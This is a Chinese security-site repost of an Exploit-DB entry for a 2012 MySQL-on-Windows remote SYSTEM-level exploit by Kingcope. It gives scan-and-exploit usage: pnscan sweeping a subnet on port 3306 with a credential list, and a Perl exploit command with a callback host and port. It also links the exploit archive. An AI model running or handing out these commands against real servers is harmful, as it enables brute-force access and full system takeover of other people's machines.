MySQL 的 Windows 远程系统级漏洞(Stuxnet 病毒采用的技术)

admin 2021年4月3日19:26:22评论103 views字数 959阅读3分11秒阅读模式

MySQL 的 Windows 远程系统级漏洞(Stuxnet 病毒采用的技术)。MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day。MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploit。

EDB-ID: 23083

CVE: N/A

OSVDB-ID: N/A

Author: Kingcope

Published: 2012-12-02

MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploit
Version 1.0
By Kingcope
In the Year of 2012

http://www.exploit-db.com/sploits/23083.zip

use this on a fast scan server!

How to use.
pnscan:

the file "accounts" holds the user/password combinations to try.
hits are saved in the file "jack.pot".

#make lnx
#./pnscan 192.168.0.0/16 3306

exploit:
#perl mysql_win_remote.pl 192.168.2.100 root "" 192.168.2.150 5555

user root on windows will mostly succeed.

/Kingcope

Download:

23083.zip (mysql_win_remote_stuxnet_technique)

From: http://www.exploit-db.com/exploits/23083/

相关内容:

About Mysql 的那个提权漏洞

文章来源于lcx.cc:MySQL 的 Windows 远程系统级漏洞(Stuxnet 病毒采用的技术)

相关推荐: 【Asp】ASP Url编码 URL编码为UTF-8格式

ASP 将URL编码为UTF-8格式: Function URLEncodetoUTF8(url)         Dim oneChar, result               Dim oneAsc                   If url = …

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:26:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MySQL 的 Windows 远程系统级漏洞(Stuxnet 病毒采用的技术)http://cn-sec.com/archives/322503.html

发表评论

匿名网友 填写信息